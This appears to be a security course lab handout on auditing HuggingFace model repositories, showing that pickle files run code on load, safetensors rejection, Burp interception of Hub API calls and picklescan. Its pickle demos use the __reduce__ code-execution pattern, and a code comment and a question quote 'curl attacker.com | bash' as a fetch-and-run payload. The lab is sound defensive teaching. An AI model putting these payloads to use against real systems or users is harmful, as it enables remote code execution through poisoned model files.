
Lab 4: Supply Chain Audit -- HuggingFace Model Card + Pickle Risk


Module: 4 (Supply Chain -- LLM03:2025)
Duration: 3 hours
Substrate: Local Python + Burp Suite Community
Points: 8


Objectives

  1. Audit a HuggingFace model repository for supply chain red flags
  2. Demonstrate why pickle is dangerous for model weights
  3. Verify that safetensors loading prevents arbitrary code execution
  4. Intercept HuggingFace Hub API calls with Burp Suite

Setup

# In your AI-101 virtualenv
pip install transformers safetensors huggingface_hub picklescan torch httpx

# Verify
python3 -c "import safetensors, picklescan; print('OK')"

Part 1: Model Card Audit Checklist (45 min)

Audit 3 HuggingFace model repositories using the checklist from Module 4.

Target models (the first two are public and widely used; the audit is read-only and never loads model weights):

  1. distilbert/distilbert-base-uncased (legitimate, well-maintained)
  2. facebook/opt-125m (legitimate; examine its file manifest)
  3. A model of your choice from the HuggingFace Hub (search for a cybersecurity-related model)

For each model, complete this checklist:

from huggingface_hub import HfApi

api = HfApi()

def audit_model(model_id: str):
    print(f"\n=== AUDITING: {model_id} ===")

    # File manifest
    try:
        files = list(api.list_repo_files(model_id))
        print(f"Files ({len(files)}):")
        for f in files:
            print(f"  {f}")
    except Exception as e:
        print(f"  Error listing files: {e}")
        return

    # Red flag check (compare lowercased names so ".BIN" or ".PT" is not missed)
    red_flags = []

    # Check for pickle-based weight files vs. safetensors
    pickle_files = [f for f in files if f.lower().endswith(('.bin', '.pt', '.pth', '.pkl'))]
    safetensors_files = [f for f in files if f.lower().endswith('.safetensors')]

    if pickle_files and not safetensors_files:
        red_flags.append(f"PICKLE only (no safetensors): {pickle_files}")

    # Check for unexpected file types
    for f in files:
        name = f.lower()
        if name.endswith(('.sh', '.exe', '.bat')):
            red_flags.append(f"Shell/executable file: {f}")
        if name.endswith('.py') and 'config' not in name:
            red_flags.append(f"Python script: {f}")

    # Check model info
    try:
        info = api.model_info(model_id)
        print(f"\nDownloads (last 30d): {info.downloads}")
        print(f"Likes: {info.likes}")
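        # info.author is only the owning namespace, not a verification flag;
        # check for the organization's "verified" badge on the Hub web page.
        print(f"Author/namespace: {info.author}")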
        created = info.created_at
        print(f"Created: {created}")
    except Exception as e:
        print(f"Info error: {e}")

    print(f"\nRed flags: {red_flags if red_flags else 'None'}")
    print(f"Has safetensors: {bool(safetensors_files)}")

audit_model("distilbert/distilbert-base-uncased")
audit_model("facebook/opt-125m")
# audit_model("your-chosen-model-id")

Record for each model:

  1. Does the repository provide safetensors variants?
  2. Are there any red flag file types?
  3. Download count and organization verification status
  4. Overall assessment: safe to use / needs further review / avoid
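
The extension checks from the audit script can also be exercised offline, which helps when filling in the record for several models. The sketch below is one possible factoring and is not part of the Module 4 checklist: `classify_manifest` and `suggest_assessment` are hypothetical helper names, the sample file list is made up, and the suggested verdict is only a first pass based on file extensions that you should override with your own judgment.

```python
from typing import Dict, List

# Extensions treated as pickle-based weights, matching the audit script.
PICKLE_EXTS = (".bin", ".pt", ".pth", ".pkl")
EXECUTABLE_EXTS = (".sh", ".exe", ".bat")


def classify_manifest(files: List[str]) -> Dict[str, List[str]]:
    """Group repository file names by the risk categories used in the checklist."""
    groups: Dict[str, List[str]] = {
        "pickle": [], "safetensors": [], "executable": [], "python": [],
    }
    for f in files:
        name = f.lower()
        if name.endswith(PICKLE_EXTS):
            groups["pickle"].append(f)
        elif name.endswith(".safetensors"):
            groups["safetensors"].append(f)
        elif name.endswith(EXECUTABLE_EXTS):
            groups["executable"].append(f)
        elif name.endswith(".py") and "config" not in name:
            groups["python"].append(f)
    return groups


def suggest_assessment(groups: Dict[str, List[str]]) -> str:
    """Map the groups to a starting verdict (assumed thresholds, not course policy)."""
    if groups["executable"]:
        return "avoid"
    if groups["python"] or (groups["pickle"] and not groups["safetensors"]):
        return "needs further review"
    return "safe to use"


# Made-up manifest for illustration only.
sample = ["config.json", "pytorch_model.bin", "README.md"]
print(suggest_assessment(classify_manifest(sample)))
```

A repository that ships only `pytorch_model.bin` lands in "needs further review" here, which mirrors the "PICKLE only" red flag in the audit script.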

Part 2: The Pickle Danger Demonstration (45 min)

This exercise demonstrates why pickle is dangerous. You will create a malicious pickle file (harmless -- it just prints a message) and observe that it executes code on load.

SAFETY NOTE: This is a local lab. The "malicious" payload only prints text. Never load untrusted pickle files on a system with sensitive data or credentials.

import pickle
import os

class MaliciousPayload:
    def __reduce__(self):
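        # __reduce__ is called when the object is pickled; it returns a
        # (callable, args) pair that the unpickler invokes at load time.
        # In a real attack, the callable would be e.g. os.system("curl attacker.com/shell.sh | bash")
        # In the lab, we just print a warning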
        return (print, ("PICKLE EXECUTION: arbitrary code ran during model load!",))

# Create the malicious pickle file
malicious_obj = MaliciousPayload()
with open("/tmp/malicious_model.pkl", "wb") as f:
    pickle.dump(malicious_obj, f)

print("Malicious pickle created. Loading it now...")
print("=" * 50)

# Load it -- this triggers the code execution
with open("/tmp/malicious_model.pkl", "rb") as f:
    result = pickle.load(f)   # EXECUTION HAPPENS HERE

print("=" * 50)
print("Load complete. The print statement above ran during unpickling.")

Simulate a "malicious model download":

import os
import pickle
import struct

# Create a pickle payload that would exfiltrate environment variables
# (Demonstration only -- no actual network call)
class EnvDumpPayload:
    def __reduce__(self):
        cmd = "python3 -c \"import os; print('ENV KEYS:', list(os.environ.keys())[:5])\""
        return (os.system, (cmd,))

payload = EnvDumpPayload()
with open("/tmp/fake_model_weights.bin", "wb") as f:
    pickle.dump(payload, f)

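print("Simulated malicious .bin file created.")
print("In a real attack: torch.load('/tmp/fake_model_weights.bin', weights_only=False) would execute the payload.")
print("PyTorch 2.6+ defaults to weights_only=True, which refuses this file; older versions and explicit weights_only=False do not.")
print("DO NOT run torch.load() on this file outside of a sandboxed environment.")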

Record:

  1. What message printed when you loaded the malicious pickle?
  2. At what point in the pickle.load() call does the code execute?
  3. If the __reduce__ method had contained os.system("curl attacker.com | bash"), what would have happened?
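
To answer question 2 without running anything, you can disassemble the pickle stream instead of loading it. The sketch below uses only the standard library; `DemoPayload` and `list_opcodes` are illustrative names, and the protocol is pinned to 4 here so the opcode names are the same across Python versions.

```python
import pickle
import pickletools


class DemoPayload:
    """Same shape as the lab payload: print would be called at load time."""

    def __reduce__(self):
        return (print, ("PICKLE EXECUTION: arbitrary code ran during model load!",))


def list_opcodes(data: bytes):
    """Return the opcode names in stream order without executing the stream."""
    return [opcode.name for opcode, arg, pos in pickletools.genops(data)]


# dumps() calls __reduce__ and records the callable; it does not call print.
blob = pickle.dumps(DemoPayload(), protocol=4)
names = list_opcodes(blob)

# STACK_GLOBAL pushes builtins.print onto the unpickler's stack;
# REDUCE is the opcode that actually calls it with the stored arguments.
print(names)
print("REDUCE present:", "REDUCE" in names)
```

Scanners such as picklescan work on the same principle: they read the opcodes and the imported names rather than calling `pickle.load()`.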

Part 3: Safetensors Prevents Code Execution (30 min)

from safetensors.torch import save_file, load_file
import torch

# Create a legitimate model tensor
tensors = {
    "weight": torch.randn(768, 768),
    "bias": torch.zeros(768)
}

# Save as safetensors
save_file(tensors, "/tmp/legitimate_model.safetensors")
print("Safetensors file created.")

# Load it safely
loaded = load_file("/tmp/legitimate_model.safetensors")
print(f"Loaded tensors: {list(loaded.keys())}")
print(f"Weight shape: {loaded['weight'].shape}")

# Now try to create a "malicious" safetensors file
# Safetensors format: 8-byte little-endian header length + JSON header + raw tensor bytes
# The format does NOT have a code execution path -- there is no __reduce__ equivalent

# Attempt to embed a pickle payload in a safetensors file.
# The loader treats the data section as raw tensor bytes only, and it rejects
# files whose header does not describe the data section exactly.
import json
import pickle
import struct

class EmbeddedPayload:
    def __reduce__(self):
        return (print, ("PICKLE EXECUTION: this must never print during a safetensors load",))

# The header claims a 4-byte F32 tensor named "script" ...
malicious_header = json.dumps({
    "script": {"dtype": "F32", "shape": [1], "data_offsets": [0, 4]}
}).encode()

header_size = struct.pack("<Q", len(malicious_header))
fake_payload = pickle.dumps(EmbeddedPayload())  # ... but the data section is a longer pickle stream

with open("/tmp/attempted_malicious.safetensors", "wb") as f:
    f.write(header_size)
    f.write(malicious_header)
    f.write(fake_payload)

# Try to load it
try:
    loaded = load_file("/tmp/attempted_malicious.safetensors")
    # Reached only if the loader accepts the file. A header that matched the payload
    # length exactly would load too, but the bytes would be plain numbers, never code.
    print(f"Loaded as inert tensor data, nothing executed: {list(loaded.keys())}")
except Exception as e:
    print(f"Safetensors refused to load malicious file: {type(e).__name__}: {e}")

Record:

  1. Did safetensors load the malicious file?
  2. What error did it raise?
  3. Why is the safetensors format inherently safer than pickle?
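
For question 3, it can help to parse the file layout by hand. The sketch below is a simplified illustration of the layout described in the code comments above (length prefix, JSON header, raw bytes), not the safetensors library's own validation logic; the function names are hypothetical and the consistency check is deliberately minimal.

```python
import json
import struct


def build_blob(header: dict, data: bytes) -> bytes:
    """Assemble the layout by hand: 8-byte length prefix, JSON header, raw data."""
    header_bytes = json.dumps(header).encode("utf-8")
    return struct.pack("<Q", len(header_bytes)) + header_bytes + data


def read_header(blob: bytes) -> dict:
    """Parse only the JSON header; the data section is never interpreted."""
    (header_len,) = struct.unpack("<Q", blob[:8])
    return json.loads(blob[8:8 + header_len].decode("utf-8"))


def data_section_matches(blob: bytes) -> bool:
    """Check that the largest declared end offset equals the data section length."""
    (header_len,) = struct.unpack("<Q", blob[:8])
    header = read_header(blob)
    ends = [
        entry["data_offsets"][1]
        for name, entry in header.items()
        if name != "__metadata__"
    ]
    return max(ends, default=0) == len(blob) - 8 - header_len


header = {"w": {"dtype": "F32", "shape": [1], "data_offsets": [0, 4]}}
good = build_blob(header, b"\x00" * 4)
bad = build_blob(header, b"\x00" * 10)  # data section longer than the header declares

print(read_header(good))
print(data_section_matches(good), data_section_matches(bad))
```

Everything a loader needs is a length, a JSON document, and byte ranges. Nothing in the file names a callable, which is the structural difference from a pickle stream.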

Part 4: Burp Suite Interception of HuggingFace API Calls (45 min)

Configure Python to route requests through Burp Suite and observe HF Hub API calls.

Setup Burp Suite:

  1. Launch Burp Suite Community
  2. Go to Proxy > Options (labelled "Proxy settings" in newer Burp releases) and confirm the listener is on 127.0.0.1:8080
  3. Turn off "Intercept" in the Proxy tab (we want to observe, not block)
  4. Go to HTTP History tab

Configure Python proxy:

import os

# Route both plain-HTTP and HTTPS requests through the Burp listener
os.environ["HTTP_PROXY"] = "http://127.0.0.1:8080"
os.environ["HTTPS_PROXY"] = "http://127.0.0.1:8080"

# Burp re-signs HTTPS traffic with its own CA, so certificate checks fail until
# that CA is trusted. The proper fix is to export Burp's CA certificate and trust
# it (see the error hint below); this lab disables verification instead.

import httpx

# Make a metadata API call (small, fast)
# verify=False is for lab purposes only (normally: install Burp CA cert)
try:
    resp = httpx.get(
        "https://huggingface.co/api/models/distilbert/distilbert-base-uncased",
        proxy="http://127.0.0.1:8080",  # httpx >= 0.26; older releases take proxies={...}
        verify=False
    )
    print(f"Status: {resp.status_code}")
    data = resp.json()
    print(f"Model: {data.get('modelId', 'unknown')}")
    print(f"Downloads: {data.get('downloads', 'N/A')}")
except Exception as e:
    print(f"Error: {e}")
    print("If you see SSL errors, install Burp's CA certificate:")
    print("  Burp > Proxy > Options (or Proxy settings) > Import / export CA certificate")

# The call above is sent by httpx itself, so it carries httpx's User-Agent.
# To capture the headers huggingface_hub sends, repeat the lookup through the library.
# It picks up the proxy from the environment and needs Burp's CA to be trusted.
from huggingface_hub import HfApi
try:
    info = HfApi().model_info("distilbert/distilbert-base-uncased")
    print(f"huggingface_hub lookup OK: {info.id}")
except Exception as e:
    print(f"huggingface_hub lookup failed (expected until Burp's CA is trusted): {e}")

In Burp HTTP History, observe:

  1. What URL does the metadata call request?
  2. What headers are included in the request?
  3. What JSON fields does the response contain?
  4. If you repeat the call with a model that only has .bin files vs. one that has .safetensors, how does the file manifest differ in the response?

Record:

  1. Screenshot or copy the HTTP request for the metadata call
  2. What User-Agent does the huggingface_hub library send?
  3. What authentication header is included (if any)?
  4. What was in the response's siblings array? (This lists all files in the repository.)
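
Once you have copied a response body out of Burp, the siblings array can be summarized with a few lines of Python. This is a sketch under assumptions: `sample_response` is a made-up, trimmed body rather than a captured one, `weight_formats` is a hypothetical helper, and the `rfilename` key should be confirmed against what you actually see in HTTP History.

```python
from typing import Dict, List

# Made-up, trimmed response body for illustration only.
sample_response = {
    "modelId": "example-org/example-model",
    "siblings": [
        {"rfilename": "config.json"},
        {"rfilename": "pytorch_model.bin"},
        {"rfilename": "model.safetensors"},
    ],
}


def weight_formats(response: dict) -> Dict[str, List[str]]:
    """Split the files listed in 'siblings' into pickle-based and safetensors weights."""
    names = [entry.get("rfilename", "") for entry in response.get("siblings", [])]
    return {
        "pickle": [n for n in names if n.lower().endswith((".bin", ".pt", ".pth", ".pkl"))],
        "safetensors": [n for n in names if n.lower().endswith(".safetensors")],
    }


formats = weight_formats(sample_response)
print(formats)
```

Running the same helper on the bodies for a .bin-only model and a safetensors model gives a direct comparison for observation 4.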

Part 5: picklescan on Downloaded Files (15 min)

# Install picklescan
pip install picklescan

# Create a test directory and copy in the files from Parts 2 and 3
mkdir -p /tmp/scan_test
cp /tmp/malicious_model.pkl /tmp/scan_test/
cp /tmp/legitimate_model.safetensors /tmp/scan_test/

# Scan
picklescan -p /tmp/scan_test/

Record:

  1. Did picklescan flag the malicious .pkl file?
  2. Did picklescan report anything about the safetensors file?
  3. What command would you add to a CI/CD pipeline to scan model files before deployment?
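
One way to approach question 3 is a small gate script that wraps the scan command and fails the pipeline step on anything other than a clean result. The sketch below is written in Python for consistency with the rest of the lab. It assumes that picklescan exits with status 0 only when nothing was flagged, which you should confirm against the version you installed; `scan_passes` is a hypothetical helper, and the `runner` parameter exists so the logic can be tested without invoking the real tool.

```python
import subprocess
from typing import Callable, List


def scan_passes(path: str, runner: Callable = subprocess.run) -> bool:
    """Run picklescan on path; treat any non-zero exit status as a failed gate."""
    command: List[str] = ["picklescan", "-p", path]
    result = runner(command)
    # Assumption: exit status 0 means no findings and no scan errors.
    return result.returncode == 0


def gate_exit_code(path: str, runner: Callable = subprocess.run) -> int:
    """Return the status a CI step should exit with: 0 to continue, 1 to block."""
    return 0 if scan_passes(path, runner) else 1
```

In a pipeline, a step could call `sys.exit(gate_exit_code("/tmp/scan_test/"))` after the model download and before any code that loads the weights. Treating every non-zero status as a block is the conservative choice, since a scan that failed to run proves nothing about the files.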

Lab Report

  1. Threat model. You are a DevSecOps engineer at a company that fine-tunes models from HuggingFace. Write a 3-step supply chain security process that would prevent pickle-based model poisoning. Be specific about where in the download/load pipeline each step runs.

  2. OWASP mapping. Map the pickle code execution attack to the OWASP LLM Top 10 (2025). Which entry is the primary mapping? Is there a secondary mapping?

  3. Burp findings. What did you learn from intercepting the HuggingFace API call that you could not have learned just by reading the huggingface_hub documentation?


Grading (8 points)

Item                                                                            Points
Part 1: 3 models audited with checklist; findings documented                    2
Parts 2-3: pickle execution demonstrated; safetensors rejection demonstrated    2
Part 4: Burp intercept working; API call captured and analyzed                  2
Lab report: all 3 questions answered                                            2